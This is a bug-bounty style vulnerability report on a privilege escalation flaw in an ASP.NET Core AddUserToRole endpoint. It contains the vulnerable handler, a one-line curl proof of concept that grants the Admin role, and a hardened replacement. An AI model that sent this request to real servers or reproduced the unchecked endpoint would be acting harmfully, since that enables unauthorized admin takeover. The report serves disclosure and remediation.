huntr | 0x41ly | B6F38F4C-9401-4696-9E51-967C23CEA1EE
History: Sep 20, 2022 - 6:53 p.m.

Normal user can set himself or any other user to admin role


Description

Improper access control on the API endpoint AddUserToRole allows a regular user to escalate their privileges to admin.

Vulnerable code

    // Any authenticated user holding the User role may call this endpoint.
    [Authorize(Roles = Roles.User)]
    [HttpPost]
    public async Task<IActionResult> AddUserToRole([FromQuery] string username, string role)
    {
        // Both the target user and the role name come straight from the request;
        // nothing restricts which role the caller is allowed to grant, or to whom.
        var results = await _auth.AddUserToRoleAsync(username, role);
        if (!results.IsSuccess)
            return BadRequest(results);
        return Ok(results);
    }

As seen, the endpoint only requires the caller to hold the User role, and there is no check on which role may be added, so the requested role can be Admin.

Proof of Concept

curl -X 'POST' \
  'http://<SERVER>/Auth/AddUserToRole?username=<AnyUser>&role=Admin' \
  -H 'accept: */*' \
  -H 'Authorization: <TOKEN>' \
  -d ''
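A hardened version of the handler, added here as an example and not the project's actual fix. It assumes the controller is named AuthController (from the /Auth/ route), that `_auth` implements an `IAuthService` interface exposing the `AddUserToRoleAsync` method seen on the page, and that a `Roles.Admin` constant exists alongside `Roles.User`:

```csharp
// Added example (not the project's code). Assumed names: AuthController,
// IAuthService, Roles.Admin; everything else is standard ASP.NET Core.
using System;
using System.Collections.Generic;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Authorization;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Logging;

[ApiController]
[Route("[controller]")]
public class AuthController : ControllerBase
{
    private readonly IAuthService _auth;
    private readonly ILogger<AuthController> _logger;

    // Roles that may ever be granted through this endpoint (explicit allowlist).
    private static readonly HashSet<string> AssignableRoles =
        new HashSet<string>(StringComparer.OrdinalIgnoreCase) { Roles.User, Roles.Admin };

    public AuthController(IAuthService auth, ILogger<AuthController> logger)
    {
        _auth = auth;
        _logger = logger;
    }

    // Fix 1: granting roles is an administrative action, so only Admin may reach it.
    [Authorize(Roles = Roles.Admin)]
    [HttpPost("AddUserToRole")]
    public async Task<IActionResult> AddUserToRole([FromQuery] string username, [FromQuery] string role)
    {
        // Fix 2: validate the role name against the allowlist instead of passing
        // whatever string the client sent down to the role store.
        if (string.IsNullOrWhiteSpace(username) || string.IsNullOrWhiteSpace(role)
            || !AssignableRoles.Contains(role))
            return BadRequest("unknown user or role");

        var results = await _auth.AddUserToRoleAsync(username, role);
        if (!results.IsSuccess)
            return BadRequest(results);

        // Fix 3: record who granted which role to whom, so an unexpected
        // Admin grant shows up in the audit log.
        _logger.LogInformation("Role grant: {Actor} added {Target} to {Role}",
            User.Identity?.Name, username, role);
        return Ok(results);
    }
}
```

With this in place the curl request above returns 403 for a caller holding only the User role, and an unknown role value is rejected before the role store is touched.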